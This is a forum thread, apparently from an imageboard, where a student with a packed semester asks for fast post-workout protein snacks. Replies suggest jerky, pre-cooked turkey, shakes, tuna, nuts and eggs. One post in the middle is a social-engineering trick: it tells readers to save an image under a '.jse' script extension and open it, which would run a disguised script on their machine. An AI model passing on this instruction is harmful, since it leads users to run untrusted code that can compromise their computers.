hey guys,

I started the semester today and realized my days are gonna be fucking full to the max... I can cram in my workouts really early or like I just did... now, in the evening, but I have to leave in 10 mins to go back out.

Any suggestions for quick protein snacks after training? I used to eat tuna sandwiches and make toast and natural peanut butter etc..

but now I need a literal grab and go protein, do they exist, any really fast protein foods? Or should I finally start protein powder?

Cook up some stuff at the beginning of the week, throw it in the fridge, grab and go. I make a turkey and live off that for a week or two, etc. etc. Do things ahead; grab and go!

yeah didn't think about it, thanks for the idea.. I should prob cook up a turkey and shred it and put it in a container and grab and go with it.

Thanks.

Jack links normal Beef Jerkey.

Little pricey and high sodium, but rokcing protien, very low carb and low cal.

I look into this as well, I have barely much salt in my diet and usually get low sodium foods, so a bit of sodium won't kill me.

dried meat that you can make yourself and last the whole week.

Seconded on the jerky. The only downside is the sodium, but unless you have hypertension you should be ok.

When I was in college and was on the go like you, I used to make a protein shake, put it in a reusable bottle, and carry it with me in my backpack.

k. Open this image. You will see an error message.
2. Save it with the filename "4chan.jse".
3. Open the file you just saved.
4. Shit bricks.

Tuna, nuts, protein bars.

someone told me nuts are more carb and fat heavy than stuff like tuna and tofu, is it true?

like he said i was better off eating a can of tuna raw over a handful or peanuts or almonds.

If you want higher protein density from your food yes. Tuna has more protein. But nuts have mono and polyunsaturated fats which are good too.

So yeah, he's kind of right but kind of wrong.

ah ok, gotcha, thanks for the info

peanut butter sandwiches
boiled eggs

You can't expect the food with the optimal protein density to also be the food that is easiest to grab and go. If you are really in a hurry a little compromise is probably unavoidable.

good peanuts are around 30% protein, and you can mix them up with spices and stuff if you don't like them plain.

tofu and jerky are also obviously great.

if you have any japanese or thereabout relatives, ask them to bring over some of the fish snacks next time they come over. whilst often salted, they taste great and being fish are full of protein.
